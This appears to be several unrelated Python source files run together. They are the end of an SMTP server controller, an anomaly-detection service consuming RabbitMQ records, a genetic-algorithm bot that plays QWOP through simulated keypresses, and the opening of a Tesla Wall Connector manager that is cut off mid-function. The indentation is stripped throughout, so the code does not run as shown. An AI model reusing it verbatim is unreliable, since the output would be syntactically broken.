if server_hostname:
self.SMTP_kwargs["hostname"] = server_hostname
# Emulate previous behavior of defaulting enable_SMTPUTF8 to True
# It actually conflicts with SMTP class's default, but the reasoning is
# discussed in the docs.
self.SMTP_kwargs.setdefault("enable_SMTPUTF8", True)
#
self._factory_invoked = threading.Event()
def factory(self):
"""Subclasses can override this to customize the handler/server creation."""
return SMTP(self.handler, **self.SMTP_kwargs)
def _factory_invoker(self) -> Union[SMTP, _FakeServer]:
"""Wraps factory() to catch exceptions during instantiation"""
try:
self.smtpd = self.factory()
if self.smtpd is None:
raise RuntimeError("factory() returned None")
return self.smtpd
except Exception as err:
self._thread_exception = err
return _FakeServer(self.loop)
finally:
self._factory_invoked.set()
@abstractmethod
def _create_server(self) -> Coroutine:
"""
Overridden by subclasses to actually perform the async binding to the
listener endpoint. When overridden, MUST refer the _factory_invoker() method.
"""
raise NotImplementedError
def _cleanup(self):
"""Reset internal variables to prevent contamination"""
self._thread_exception = None
self._factory_invoked.clear()
self.server_coro = None
self.server = None
self.smtpd = None
def cancel_tasks(self, stop_loop: bool = True):
"""
Convenience method to stop the loop and cancel all tasks.
Use loop.call_soon_threadsafe() to invoke this.
"""
if stop_loop: # pragma: nobranch
self.loop.stop()
try:
_all_tasks = asyncio.all_tasks # pytype: disable=module-attr
except AttributeError: # pragma: py-gt-36
_all_tasks = asyncio.Task.all_tasks
for task in _all_tasks(self.loop):
# This needs to be invoked in a thread-safe way
task.cancel()
@public
class BaseThreadedController(BaseController, metaclass=ABCMeta):
_thread: Optional[threading.Thread] = None
_thread_exception: Optional[Exception] = None
def __init__(
self,
handler: Any,
loop: asyncio.AbstractEventLoop = None,
*,
ready_timeout: float = DEFAULT_READY_TIMEOUT,
ssl_context: Optional[ssl.SSLContext] = None,
# SMTP parameters
server_hostname: Optional[str] = None,
**SMTP_parameters,
):
super().__init__(
handler,
loop,
ssl_context=ssl_context,
server_hostname=server_hostname,
**SMTP_parameters,
)
self.ready_timeout = float(
os.getenv("AIOSMTPD_CONTROLLER_TIMEOUT", ready_timeout)
)
@abstractmethod
def _trigger_server(self):
"""
Overridden by subclasses to trigger asyncio to actually initialize the SMTP
class (it's lazy initialization, done only on initial connection).
"""
raise NotImplementedError
def _run(self, ready_event: threading.Event) -> None:
asyncio.set_event_loop(self.loop)
try:
# Need to do two-step assignments here to ensure IDEs can properly
# detect the types of the vars. Cannot use `assert isinstance`, because
# Python 3.6 in asyncio debug mode has a bug wherein CoroWrapper is not
# an instance of Coroutine
self.server_coro = self._create_server()
srv: AsyncServer = self.loop.run_until_complete(self.server_coro)
self.server = srv
except Exception as error: # pragma: on-wsl
# Usually will enter this part only if create_server() cannot bind to the
# specified host:port.
#
# Somehow WSL 1.0 (Windows Subsystem for Linux) allows multiple
# listeners on one port?!
# That is why we add "pragma: on-wsl" there, so this block will not affect
# coverage on WSL 1.0.
self._thread_exception = error
return
self.loop.call_soon(ready_event.set)
self.loop.run_forever()
# We reach this point when loop is ended (by external code)
# Perform some stoppages to ensure endpoint no longer bound.
self.server.close()
self.loop.run_until_complete(self.server.wait_closed())
self.loop.close()
self.server = None
def start(self):
"""
Start a thread and run the asyncio event loop in that thread
"""
assert self._thread is None, "SMTP daemon already running"
self._factory_invoked.clear()
ready_event = threading.Event()
self._thread = threading.Thread(target=self._run, args=(ready_event,))
self._thread.daemon = True
self._thread.start()
# Wait a while until the server is responding.
start = time.monotonic()
if not ready_event.wait(self.ready_timeout):
# An exception within self._run will also result in ready_event not set
# So, we first test for that, before raising TimeoutError
if self._thread_exception is not None: # pragma: on-wsl
# See comment about WSL1.0 in the _run() method
raise self._thread_exception
else:
raise TimeoutError(
"SMTP server failed to start within allotted time. "
"This might happen if the system is too busy. "
"Try increasing the `ready_timeout` parameter."
)
respond_timeout = self.ready_timeout - (time.monotonic() - start)
# Apparently create_server invokes factory() "lazily", so exceptions in
# factory() go undetected. To trigger factory() invocation we need to open
# a connection to the server and 'exchange' some traffic.
try:
self._trigger_server()
except socket_timeout:
# We totally don't care of timeout experienced by _testconn,
pass
except Exception:
# Raise other exceptions though
raise
if not self._factory_invoked.wait(respond_timeout):
raise TimeoutError(
"SMTP server started, but not responding within allotted time. "
"This might happen if the system is too busy. "
"Try increasing the `ready_timeout` parameter."
)
if self._thread_exception is not None:
raise self._thread_exception
# Defensive
if self.smtpd is None:
raise RuntimeError("Unknown Error, failed to init SMTP server")
def stop(self, no_assert: bool = False):
"""
Stop the loop, the tasks in the loop, and terminate the thread as well.
"""
assert no_assert or self._thread is not None, "SMTP daemon not running"
self.loop.call_soon_threadsafe(self.cancel_tasks)
if self._thread is not None:
self._thread.join()
self._thread = None
self._cleanup()
@public
class BaseUnthreadedController(BaseController, metaclass=ABCMeta):
def __init__(
self,
handler: Any,
loop: asyncio.AbstractEventLoop = None,
*,
ssl_context: Optional[ssl.SSLContext] = None,
# SMTP parameters
server_hostname: Optional[str] = None,
**SMTP_parameters,
):
super().__init__(
handler,
loop,
ssl_context=ssl_context,
server_hostname=server_hostname,
**SMTP_parameters,
)
self.ended = threading.Event()
def begin(self):
"""
Sets up the asyncio server task and inject it into the asyncio event loop.
Does NOT actually start the event loop itself.
"""
asyncio.set_event_loop(self.loop)
# Need to do two-step assignments here to ensure IDEs can properly
# detect the types of the vars. Cannot use `assert isinstance`, because
# Python 3.6 in asyncio debug mode has a bug wherein CoroWrapper is not
# an instance of Coroutine
self.server_coro = self._create_server()
srv: AsyncServer = self.loop.run_until_complete(self.server_coro)
self.server = srv
async def finalize(self):
"""
Perform orderly closing of the server listener.
NOTE: This is an async method; await this from an async or use
loop.create_task() (if loop is still running), or
loop.run_until_complete() (if loop has stopped)
"""
self.ended.clear()
server = self.server
server.close()
await server.wait_closed()
self.server_coro.close()
self._cleanup()
self.ended.set()
def end(self):
"""
Convenience method to asynchronously invoke finalize().
Consider using loop.call_soon_threadsafe to invoke this method, especially
if your loop is running in a different thread. You can afterwards .wait() on
ended attribute (a threading.Event) to check for completion, if needed.
"""
self.ended.clear()
if self.loop.is_running():
self.loop.create_task(self.finalize())
else:
self.loop.run_until_complete(self.finalize())
@public
class InetMixin(BaseController, metaclass=ABCMeta):
def __init__(
self,
handler: Any,
hostname: Optional[str] = None,
port: int = 8025,
loop: asyncio.AbstractEventLoop = None,
**kwargs,
):
super().__init__(
handler,
loop,
**kwargs,
)
self._localhost = get_localhost()
self.hostname = self._localhost if hostname is None else hostname
self.port = port
def _create_server(self) -> Coroutine:
"""
Creates a 'server task' that listens on an INET host:port.
Does NOT actually start the protocol object itself;
_factory_invoker() is only called upon fist connection attempt.
"""
return self.loop.create_server(
self._factory_invoker,
host=self.hostname,
port=self.port,
ssl=self.ssl_context,
)
def _trigger_server(self):
"""
Opens a socket connection to the newly launched server, wrapping in an SSL
Context if necessary, and read some data from it to ensure that factory()
gets invoked.
"""
# At this point, if self.hostname is Falsy, it most likely is "" (bind to all
# addresses). In such case, it should be safe to connect to localhost)
hostname = self.hostname or self._localhost
with ExitStack() as stk:
s = stk.enter_context(create_connection((hostname, self.port), 1.0))
if self.ssl_context:
s = stk.enter_context(self.ssl_context.wrap_socket(s))
s.recv(1024)
@public
class UnixSocketMixin(BaseController, metaclass=ABCMeta): # pragma: no-unixsock
def __init__(
self,
handler: Any,
unix_socket: Union[str, Path],
loop: asyncio.AbstractEventLoop = None,
**kwargs,
):
super().__init__(
handler,
loop,
**kwargs,
)
self.unix_socket = str(unix_socket)
def _create_server(self) -> Coroutine:
"""
Creates a 'server task' that listens on a Unix Socket file.
Does NOT actually start the protocol object itself;
_factory_invoker() is only called upon fist connection attempt.
"""
return self.loop.create_unix_server(
self._factory_invoker,
path=self.unix_socket,
ssl=self.ssl_context,
)
def _trigger_server(self):
"""
Opens a socket connection to the newly launched server, wrapping in an SSL
Context if necessary, and read some data from it to ensure that factory()
gets invoked.
"""
with ExitStack() as stk:
s: makesock = stk.enter_context(makesock(AF_UNIX, SOCK_STREAM))
s.connect(self.unix_socket)
if self.ssl_context:
s = stk.enter_context(self.ssl_context.wrap_socket(s))
s.recv(1024)
@public
class Controller(InetMixin, BaseThreadedController):
"""Provides a multithreaded controller that listens on an INET endpoint"""
def _trigger_server(self):
# Prevent confusion on which _trigger_server() to invoke.
# Or so LGTM.com claimed
InetMixin._trigger_server(self)
@public
class UnixSocketController( # pragma: no-unixsock
UnixSocketMixin, BaseThreadedController
):
"""Provides a multithreaded controller that listens on a Unix Socket file"""
def _trigger_server(self): # pragma: no-unixsock
# Prevent confusion on which _trigger_server() to invoke.
# Or so LGTM.com claimed
UnixSocketMixin._trigger_server(self)
@public
class UnthreadedController(InetMixin, BaseUnthreadedController):
"""Provides an unthreaded controller that listens on an INET endpoint"""
pass
@public
class UnixSocketUnthreadedController( # pragma: no-unixsock
UnixSocketMixin, BaseUnthreadedController
):
"""Provides an unthreaded controller that listens on a Unix Socket file"""
pass
|
main.py | #
# Copyright 2020, Fernando Lemes da Silva
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import sys
import logging
import time
import threading
import pika
import json
import uuid
from pymongo import MongoClient
from AnomalyDetector import AnomalyDetector
import redis
from flask import Flask
from prometheus_flask_exporter import PrometheusMetrics
logger = logging.getLogger()
logger.setLevel(logging.INFO)
handler = logging.StreamHandler(sys.stdout)
handler.setLevel(logging.INFO)
handler.setFormatter(logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s'))
logger.addHandler(handler)
if 'REDIS_HOST' in os.environ:
redis_host = os.environ['REDIS_HOST']
else:
redis_host = 'localhost'
if 'REDIS_PORT' in os.environ:
redis_port = os.environ['REDIS_PORT']
else:
redis_port = '6379'
logger.info('Using Redis at: %s:%s', redis_host, redis_port)
if 'MONGO_URL' in os.environ:
mongo_url = os.environ['MONGO_URL']
logger.info('Using mongo URL: %s', mongo_url)
else:
logger.fatal('Missing MONGO_URL environment variable.')
sys.exit()
if 'MONGO_DATABASE' in os.environ:
mongo_database = os.environ['MONGO_DATABASE']
else:
mongo_database = 'kubeowl'
logger.info('Using mongo database: %s', mongo_database)
if 'MONGO_HTTP_RECORDS' in os.environ:
mongo_http_records = os.environ['MONGO_HTTP_RECORDS']
else:
mongo_http_records = 'http_records'
logger.info('HTTP records collection is: %s', mongo_http_records)
if 'MONGO_ANOMALIES' in os.environ:
mongo_anomalies = os.environ['MONGO_ANOMALIES']
else:
mongo_anomalies = "anomalies"
logger.info('Anomalies collection is: %s', mongo_anomalies)
if 'MONGO_SAMPLES' in os.environ:
mongo_samples = os.environ['MONGO_SAMPLES']
else:
mongo_samples = "samples"
logger.info('Samples collection is: %s', mongo_samples)
if 'RABBITMQ_HOST' in os.environ:
rabbitmq_host = os.environ['RABBITMQ_HOST']
logger.info('Using RabbitMQ host: %s', rabbitmq_host)
else:
logger.fatal('Missing RABBITMQ_HOST environment variable.')
sys.exit()
if 'RABBITMQ_EXCHANGE' in os.environ:
rabbitmq_exchange = os.environ['RABBITMQ_EXCHANGE']
else:
rabbitmq_exchange = "http_enriched_records"
logger.info('RabbitMQ exchange: %s', rabbitmq_exchange)
if 'RABBITMQ_QUEUE' in os.environ:
rabbitmq_queue = os.environ['RABBITMQ_QUEUE']
else:
rabbitmq_queue = 'evaluate_response_time'
logger.info('RabbitMQ queue: %s', rabbitmq_queue)
service_ok = False
records_processed = 0
flask_app = Flask(__name__)
metrics = PrometheusMetrics(flask_app)
counter = metrics.info('evaluated_records', 'Number of evaluated records')
counter.set(0)
anomaly_counter = metrics.info('abnormal_records', 'Number of abnormal records')
anomaly_counter.set(0)
@flask_app.route('/healthcheck')
@metrics.do_not_track()
def healthcheck():
if service_ok:
return 'OK', 200
else:
return 'NOK', 400
anomaly_detector = AnomalyDetector()
# Create indexes
client = MongoClient(mongo_url)
database = client[mongo_database]
http_recors_collection = database[mongo_http_records]
http_recors_collection.create_index([("aggregate_id", 1)])
http_recors_collection.create_index([("aggregate_id", 1), ("random", 1)])
http_recors_collection.create_index([("aggregate_id", 1), ("timestamp", 1)])
anomalies_collection = database[mongo_anomalies]
anomalies_collection.create_index([("aggregate_id", 1)])
anomalies_collection.create_index([("aggregate_id", 1), ("timestamp", 1)])
samples_collection = database[mongo_samples]
samples_collection.create_index([("aggregate_id", 1)])
def run_trainer():
global service_ok
while True:
try:
client = MongoClient(mongo_url)
database = client[mongo_database]
http_records_collection = database[mongo_http_records]
anomalies_collection = database[mongo_anomalies]
samples_collection = database[mongo_samples]
redis_client = redis.Redis(host=redis_host, port=int(redis_port), db=0)
service_ok = True
while True:
anomaly_detector.training_thread(http_records_collection, anomalies_collection, samples_collection, redis_client)
time.sleep(3600)
except:
service_ok = False
logger.exception("Failure at training thread.")
time.sleep(15)
def evaluate_message(anomalies_collection, redis_client, data):
global counter, records_processed
if anomaly_detector.is_anomalous(redis_client, data):
anomaly_counter.inc()
data['_id'] = str(uuid.uuid4())
data['anomaly'] = 'anomaly-detector'
anomalies_collection.insert_one(data)
counter.inc()
records_processed += 1
def run_queue_listener():
global service_ok
while True:
connected = False
while not connected:
try:
connection = pika.BlockingConnection(pika.ConnectionParameters(rabbitmq_host))
channel = connection.channel()
channel.queue_declare(queue = rabbitmq_queue, exclusive = False)
channel.queue_bind(exchange = rabbitmq_exchange, queue = rabbitmq_queue)
connected = True
except (pika.exceptions.AMQPConnectionError, pika.exceptions.ChannelClosedByBroker):
logger.info('Waiting before retrying RabbitMQ connection...')
time.sleep(15)
try:
client = MongoClient(mongo_url)
database = client[mongo_database]
anomalies_collection = database[mongo_anomalies]
redis_client = redis.Redis(host=redis_host, port=int(redis_port), db=0)
def callback(channel, method, properties, body):
data = json.loads(body)
evaluate_message(anomalies_collection, redis_client, data)
channel.basic_consume(queue=rabbitmq_queue, on_message_callback=callback, auto_ack=True)
service_ok = True
channel.start_consuming()
except:
service_ok = False
logger.exception("Failure evaluating records.")
time.sleep(15)
def run_report_records_processed():
global records_processed
while True:
if records_processed > 0:
count = records_processed
records_processed -= count
logger.info("%d records evaluated during last minute.", count)
time.sleep(60)
if __name__ == "__main__":
try:
training_thread = threading.Thread(target=run_trainer)
training_thread.start()
report_records_processed_thread = threading.Thread(target=run_report_records_processed)
report_records_processed_thread.start()
queue_listener_thread=threading.Thread(target=run_queue_listener)
queue_listener_thread.start()
flask_app.run(host='0.0.0.0', port=80)
except (IOError, SystemExit):
raise
except KeyboardInterrupt:
logger.info("Shutting down.")
|
autoqwopper.py | import ImageGrab
import Image
import os
import time
from random import *
import win32api, win32con
import threading
from pytesser import *
from deap import base
from deap import creator
from deap import tools
import numpy
import math
import pickle
import sys
# Globals
LB_FILE = open('../logbook.pickle', 'w+')
# DEAP stuff
IND_SIZE = 5 #number of key presses
POP_SIZE = 1 #number of individuals
T_SIZE = 3 #tournament size
generations = 1000 #number of generations
selb = 1 #how many individuals to select when you call toolbox.selectBest
selw = 5 #how many individuals to select whe nyou call toolbox.selectWorst
# QWOP stuff
# Bounding box for QWOP
start_x, start_y = 9, 105
end_x, end_y = 640 + start_x, 400 + start_y
frame = (start_x, start_y, end_x, end_y)
# Bounding box for the "metres" dialogue box
metres_start_x, metres_start_y = 170, 24
metres_end_x, metres_end_y = 413, 50
metres_box = (metres_start_x, metres_start_y, metres_end_x, metres_end_y)
# x, y coordinate of the ribbon that pops up when you die
ribbon_x, ribbon_y = 155, 125
ribbon_pixel = (ribbon_x, ribbon_y)
# QWOP codes
QWOP_CODE = {
'P': (False, False, False, False),
'D': (False, False, False, True),
'C': (False, False, True, False),
'J': (False, False, True, True),
'B': (False, True, False, False),
'I': (False, True, False, True),
'H': (False, True, True, False),
'N': (False, True, True, True),
'A': (True, False, False, False),
'G': (True, False, False, True),
'F': (True, False, True, False),
'M': (True, False, True, True),
'E': (True, True, False, False),
'L': (True, True, False, True),
'K': (True, True, True, False),
'O': (True, True, True, True),
None: (False, False, False, False)
}
# Key codes
VK_CODE = {
'SPACE':0x20,
'O':0x4F,
'P':0x50,
'Q':0x51,
'W':0x57
}
def sendKey(key, duration=0.1, up=True):
win32api.keybd_event(key, 0, 0, 0)
time.sleep(duration)
if(up):
win32api.keybd_event(key, 0, win32con.KEYEVENTF_KEYUP, 0)
def leftClick(coords, duration=0.1, up=True):
win32api.SetCursorPos((start_x + coords[0], start_y + coords[1]))
win32api.mouse_event(win32con.MOUSEEVENTF_LEFTDOWN,0,0)
time.sleep(duration)
if (up):
win32api.mouse_event(win32con.MOUSEEVENTF_LEFTUP,0,0)
def sendKeys(keys):
"""
Send a list of (key, duration) pairs concurrently
"""
threads = []
for (key, duration, up) in keys:
t = threading.Thread(target=sendKey, args=(VK_CODE[key], duration, up))
threads.append(t)
for thread in threads:
thread.start()
def sendQwopCode(key, next=None):
"""
Send a QWOP-encoded key to the game.
"""
(q, w, o, p) = QWOP_CODE[key]
(_q, _w, _o, _p) = QWOP_CODE[next]
keys = []
if q:
keys.append(('Q', 0.15, True))
if w:
keys.append(('W', 0.15, True))
if o:
keys.append(('O', 0.15, True))
if p:
keys.append(('P', 0.15, True))
# Send the keys
sendKeys(keys)
# wait for them to finish before moving on to the next one
time.sleep(0.15)
def getRandomQwopString(numChars=5):
qwopString = ""
for i in xrange(numChars):
qwopString += chr(randint(65, 80))
return qwopString
class AutoQwopper:
def __init__(self):
self.update()
def getMetres(self):
metres = float(image_to_string(self.metres_frame)[:-9].replace(' ', ''))
self.metres = metres
def update(self):
self.qwop_frame = ImageGrab.grab(frame)
self.metres_frame = self.qwop_frame.crop(metres_box)
self.getMetres()
def die(self):
print('Killing qwopper.')
sendKey(VK_CODE['Q'], duration=1.5)
sendKey(VK_CODE['W'], duration=1.5)
def isDead(self):
return (self.qwop_frame.getpixel(ribbon_pixel) == (255, 255, 0))
def beginGame(self):
leftClick((100, 100))
def restartGame(self):
sendKey(VK_CODE['SPACE'])
def run(self, qwopString):
self.beginGame()
if (self.isDead()):
# restart game if this isn't the first time playing
self.restartGame()
self.update()
self.getMetres()
print ("Evaluating qwop string: " + "".join(qwopString))
start = time.time()
running = True
while running:
for qwopCode, next in zip(qwopString, qwopString[1:] + [None]):
sendQwopCode(qwopCode, next)
self.update()
if (self.isDead()):
running = False
# Set fitness to 0 if crashed
# self.metres = 0
print("Qwopper died")
break
if (time.time() - start > 60):
running = False
print("Time exceeded")
# Do one final update
time.sleep(0.5)
self.update()
break
if (not self.isDead()):
self.die()
print ("Went a total of " + str(self.metres) + " metres before dying.")
time.sleep(2)
return self.metres
# The main GA
def evaluate(ind):
qwopper = AutoQwopper()
return qwopper.run(ind),
def generateGene():
#generate a gene
return chr(randint(65, 80))
def mutate(ind):
#select a random character and randomize it
#mutation as described in google's paper
ind[randint(0, len(ind)-1)] = chr(randint(65, 80))
return ind
toolbox = base.Toolbox()
creator.create("FitnessMax", base.Fitness, weights=(1.0,))
creator.create("Individual", list, fitness = creator.FitnessMax)
toolbox.register("individual", tools.initRepeat, creator.Individual, generateGene, n=IND_SIZE)
toolbox.register("select", tools.selTournament, k=2, tournsize=T_SIZE)
toolbox.register("onePoint", tools.cxOnePoint)
toolbox.register("twoPoint", tools.cxTwoPoint)
toolbox.register("selectBest", tools.selBest, k=selb)
toolbox.register("selectWorst", tools.selWorst, k=selw)
# GENERATE STATISTICS
stats = tools.Statistics(key=lambda ind: ind.fitness.values)
hallOfFame = tools.HallOfFame(1)
logbook = tools.Logbook()
stats.register('max', max)
stats.register('min', min)
stats.register('mean', numpy.mean)
def updateStatistics(population, generation):
hallOfFame.update(population)
record = stats.compile(population)
record['best'] = "".join(hallOfFame[0])
record['generation'] = generation
logbook.record(**record)
pickle.dump(logbook, LB_FILE)
def main():
population = [toolbox.individual() for i in range(POP_SIZE)] #generate population
for i in range(len(population)):
#evaluate populations
population[i].fitness.values = evaluate(population[i])
for i in range(generations):
updateStatistics(population, i)
selected = toolbox.select(population) #select
parent1 = toolbox.clone(selected[0])
parent2 = toolbox.clone(selected[1])
child = toolbox.onePoint(parent1, parent2)[0] #crossover
child = mutate(child)
child.fitness.values = evaluate(child) #evaluate child
population.remove(choice(toolbox.selectWorst(population))) #survivor select
population.append(child) #replacement
def runOne(qwopString):
autoQwopper = AutoQwopper()
autoQwopper.run(qwopString)
if __name__ == '__main__':
if (len(sys.argv) > 1):
print ("Running a single genotype.")
runOne(list(sys.argv[1]))
else:
main() |
TWCManager.py | #! /usr/bin/python3
################################################################################
# Code and TWC protocol reverse engineering by Chris Dragon.
#
# Additional logs and hints provided by Teslamotorsclub.com users:
# TheNoOne, IanAmber, and twc.
# Thank you!
#
# For support and information, please read through this thread:
# https://teslamotorsclub.com/tmc/threads/new-wall-connector-load-sharing-protocol.72830
#
# Report bugs at https://github.com/ngardiner/TWCManager/issues
#
# This software is released under the "Unlicense" model: http://unlicense.org
# This means source code and TWC protocol knowledge are released to the general
# public free for personal or commercial use. I hope the knowledge will be used
# to increase the use of green energy sources by controlling the time and power
# level of car charging.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
# For more information, please visit http://unlicense.org
import importlib
import logging
import os.path
import math
import re
import sys
import time
import traceback
import datetime
import yaml
import threading
from TWCManager.TWCMaster import TWCMaster
import requests
from enum import Enum
logging.addLevelName(19, "INFO2")
logging.addLevelName(18, "INFO4")
logging.addLevelName(17, "INFO4")
logging.addLevelName(16, "INFO5")
logging.addLevelName(15, "INFO6")
logging.addLevelName(14, "INFO7")
logging.addLevelName(13, "INFO8")
logging.addLevelName(12, "INFO9")
logging.addLevelName(9, "DEBUG2")
logging.INFO2 = 19
logging.INFO3 = 18
logging.INFO4 = 17
logging.INFO5 = 16
logging.INFO6 = 15
logging.INFO7 = 14
logging.INFO8 = 13
logging.INFO9 = 12
logging.DEBUG2 = 9
logger = logging.getLogger("\u26FD Manager")
# Define available modules for the instantiator
# All listed modules will be loaded at boot time
# Logging modules should be the first one to load
modules_available = [
"Logging.ConsoleLogging",
"Logging.FileLogging",
"Logging.SentryLogging",
"Logging.CSVLogging",
"Logging.MySQLLogging",
"Logging.SQLiteLogging",
"Protocol.TWCProtocol",
"Interface.Dummy",
"Interface.RS485",
"Interface.TCP",
"Policy.Policy",
"Vehicle.TeslaAPI",
"Vehicle.TeslaMateVehicle",
"Control.WebIPCControl",
"Control.HTTPControl",
"Control.MQTTControl",
# "Control.OCPPControl",
"EMS.Efergy",
"EMS.EmonCMS",
"EMS.Enphase",
"EMS.Fronius",
"EMS.Growatt",
"EMS.HASS",
"EMS.IotaWatt",
"EMS.Kostal",
"EMS.OpenHab",
"EMS.OpenWeatherMap",
"EMS.P1Monitor",
"EMS.SmartMe",
"EMS.SmartPi",
"EMS.SolarEdge",
"EMS.SolarLog",
"EMS.TeslaPowerwall2",
"EMS.TED",
"EMS.Volkszahler",
"EMS.URL",
"Status.HASSStatus",
"Status.MQTTStatus",
]
# Enable support for Python Visual Studio Debugger
if "DEBUG_SECRET" in os.environ:
import ptvsd
ptvsd.enable_attach(os.environ["DEBUG_SECRET"])
ptvsd.wait_for_attach()
##########################
# Load Configuration File
config = None
jsonconfig = None
if os.path.isfile("/etc/twcmanager/config.json"):
jsonconfig = open("/etc/twcmanager/config.json")
else:
if os.path.isfile("config.json"):
jsonconfig = open("config.json")
if jsonconfig:
configtext = ""
for line in jsonconfig:
if line.lstrip().startswith("//") or line.lstrip().startswith("#"):
configtext += "\n"
else:
configtext += line.replace("\t", " ").split("#")[0]
config = yaml.safe_load(configtext)
configtext = None
else:
logger.error("Unable to find a configuration file.")
sys.exit()
logLevel = config["config"].get("logLevel")
if logLevel == None:
debugLevel = config["config"].get("debugLevel", 1)
debug_to_log = {
0: 40,
1: 20,
2: 19,
3: 18,
4: 17,
5: 16,
6: 15,
7: 14,
8: 13,
9: 12,
10: 10,
11: 9,
}
for debug, log in debug_to_log.items():
if debug >= debugLevel:
logLevel = log
break
logging.getLogger().setLevel(logLevel)
# All TWCs ship with a random two-byte TWCID. We default to using 0x7777 as our
# fake TWC ID. There is a 1 in 64535 chance that this ID will match each real
# TWC on the network, in which case you should pick a different random id below.
# This isn't really too important because even if this ID matches another TWC on
# the network, that TWC will pick its own new random ID as soon as it sees ours
# conflicts.
fakeTWCID = bytearray(b"\x77\x77")
#
# End configuration parameters
#
##############################
##############################
#
# Begin functions
#
def hex_str(s: str):
return " ".join("{:02X}".format(ord(c)) for c in s)
def hex_str(ba: bytearray):
return " ".join("{:02X}".format(c) for c in ba)
def time_now():
global config
return datetime.datetime.now().strftime(
"%H:%M:%S" + (".%f" if config["config"]["displayMilliseconds"] else "")
)
def unescape_msg(inmsg: bytearray, msgLen):
# Given a message received on the RS485 network, remove leading and trailing
# C0 byte, unescape special byte values, and verify its data matches the CRC
# byte.
# Note that a bytearray is mutable, whereas a bytes object isn't.
# By initializing a bytearray and concatenating the incoming bytearray
# to it, we protect against being passed an immutable bytes object
msg = bytearray() + inmsg[0:msgLen]
# See notes in RS485.send() for the way certain bytes in messages are escaped.
# We basically want to change db dc into c0 and db dd into db.
# Only scan to one less than the length of the string to avoid running off
# the end looking at i+1.
i = 0
while i < len(msg):
if msg[i] == 0xDB:
if msg[i + 1] == 0xDC:
# Replace characters at msg[i] and msg[i+1] with 0xc0,
# shortening the string by one character. In Python, msg[x:y]
# refers to a substring starting at x and ending immediately
# before y. y - x is the length of the substring.
msg[i : i + 2] = [0xC0]
elif msg[i + 1] == 0xDD:
msg[i : i + 2] = [0xDB]
else:
logger.info(
"ERROR: Special character 0xDB in message is "
"followed by invalid character 0x%02X. "
"Message may be corrupted." % (msg[i + 1])
)
# Replace the character with something even though it's probably
# not the right thing.
msg[i : i + 2] = [0xDB]
i = i + 1
# Remove leading and trailing C0 byte.
msg = msg[1 : len(msg) - 1]
return msg
def background_tasks_thread(master):
carapi = master.getModuleByName("TeslaAPI")
while True:
try:
task = master.getBackgroundTask()
if "cmd" in task:
if task["cmd"] == "applyChargeLimit":
carapi.applyChargeLimit(limit=task["limit"])
elif task["cmd"] == "charge":
# car_api_charge does nothing if it's been under 60 secs since it
# was last used so we shouldn't have to worry about calling this
# too frequently.
carapi.car_api_charge(task["charge"])
elif task["cmd"] == "carApiEmailPassword":
carapi.resetCarApiLastErrorTime()
carapi.car_api_available(task["email"], task["password"])
elif task["cmd"] == "checkArrival":
limit = (
carapi.lastChargeLimitApplied
if carapi.lastChargeLimitApplied != 0
else -1
)
carapi.applyChargeLimit(limit=limit, checkArrival=True)
elif task["cmd"] == "checkCharge":
carapi.updateChargeAtHome()
elif task["cmd"] == "checkDeparture":
carapi.applyChargeLimit(
limit=carapi.lastChargeLimitApplied, checkDeparture=True
)
elif task["cmd"] == "checkGreenEnergy":
check_green_energy()
elif task["cmd"] == "checkVINEntitlement":
# The two possible arguments are task["subTWC"] which tells us
# which TWC to check, or task["vin"] which tells us which VIN
if task.get("vin", None):
task["subTWC"] = master.getTWCbyVIN(task["vin"])
if task["subTWC"]:
if master.checkVINEntitlement(task["subTWC"]):
logger.info(
"Vehicle %s on TWC %02X%02X is permitted to charge."
% (
task["subTWC"].currentVIN,
task["subTWC"].TWCID[0],
task["subTWC"].TWCID[1],
)
)
else:
logger.info(
"Vehicle %s on TWC %02X%02X is not permitted to charge. Terminating session."
% (
task["subTWC"].currentVIN,
task["subTWC"].TWCID[0],
task["subTWC"].TWCID[1],
)
)
master.sendStopCommand(task["subTWC"].TWCID)
elif task["cmd"] == "getLifetimekWh":
master.getSlaveLifetimekWh()
elif task["cmd"] == "getVehicleVIN":
master.getVehicleVIN(task["slaveTWC"], task["vinPart"])
elif task["cmd"] == "snapHistoryData":
master.snapHistoryData()
elif task["cmd"] == "updateStatus":
update_statuses()
elif task["cmd"] == "webhook":
if config["config"].get("webhookMethod", "POST") == "GET":
requests.get(task["url"])
else:
body = master.getStatus()
requests.post(task["url"], json=body)
elif task["cmd"] == "saveSettings":
master.saveSettings()
elif task["cmd"] == "sunrise":
update_sunrise_sunset()
except:
logger.info(
"%s: "
+ traceback.format_exc()
+ ", occurred when processing background task",
"BackgroundError",
extra={"colored": "red"},
)
pass
# task_done() must be called to let the queue know the task is finished.
# backgroundTasksQueue.join() can then be used to block until all tasks
# in the queue are done.
master.doneBackgroundTask(task)
def check_green_energy():
global config, hass, master
# Check solar panel generation using an API exposed by
# the HomeAssistant API.
#
# You may need to customize the sensor entity_id values
# to match those used in your environment. This is configured
# in the config section at the top of this file.
#
# Poll all loaded EMS modules for consumption and generation values
for module in master.getModulesByType("EMS"):
master.setConsumption(module["name"], module["ref"].getConsumption())
master.setGeneration(module["name"], module["ref"].getGeneration())
# Set max amps iff charge_amps isn't specified on the policy.
if master.getModuleByName("Policy").policyIsGreen():
master.setMaxAmpsToDivideAmongSlaves(master.getMaxAmpsToDivideGreenEnergy())
def update_statuses():
# Print a status update if we are on track green energy showing the
# generation and consumption figures
maxamps = master.getMaxAmpsToDivideAmongSlaves()
maxampsDisplay = f"{maxamps:.2f}A"
